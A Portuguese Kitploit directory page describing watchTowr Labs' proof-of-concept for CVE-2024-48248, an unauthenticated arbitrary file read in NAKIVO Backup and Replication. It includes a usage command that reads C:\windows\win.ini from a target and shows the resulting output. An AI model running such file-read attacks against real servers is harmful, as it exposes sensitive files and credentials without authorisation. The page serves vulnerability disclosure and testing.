Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nakivo-arbitrary-file-read-poc-CVE-2024-48248 — Exploração de prova de conceito para CVE-2024-48248, demonstrando leitura arbitrária de arquivos não autenticada no NAKIVO Backup and Replication Solution. Inclui um script Python para testar versões afetadas. | Kitploit
Ferramentas/GitHubGitHub/watchtowrlabs/nakivo-arbitrary-file-read-poc-cve-2024-48248
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubwatchtowrlabs/nakivo-arbitrary-file-read-poc-cve-2024-48248

nakivo-arbitrary-file-read-poc-CVE-2024-48248

Exploração de prova de conceito para CVE-2024-48248, demonstrando leitura arbitrária de arquivos não autenticada no NAKIVO Backup and Replication Solution. Inclui um script Python para testar versões afetadas.

Ver Repositório
32há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-48248

Solução NAKIVO Backup and Replication: Prova de Conceito de Leitura Arbitrária de Arquivos Não Autenticada

Consulte nosso post no blog para detalhes técnicos

Detecção em Ação

python3 watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py --url https://192.168.1.1:4443 --file "C:\\windows\\win.ini"
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py
        (*) Nakivo Unauthenticated Arbitrary File Read (CVE-2024-48248) POC by watchTowr
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2024-48248]
        
[*] Targeting https://192.168.1.1:4443
[*] Attempting to read file 'C:\windows\win.ini'
[*] File Contents:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Descrição

Este script é uma prova de conceito para CVE-2024-48248, visando a Solução NAKIVO Backup and Replication. Mais detalhes são descritos em nosso [post no blog] (https://labs.watchtowr.com/).

Versões Afetadas

  • Solução NAKIVO Backup and Replication 10.11.3.86570 e anteriores

Siga o watchTowr Labs

Para as pesquisas de segurança mais recentes, siga a equipe watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Baixar ferramenta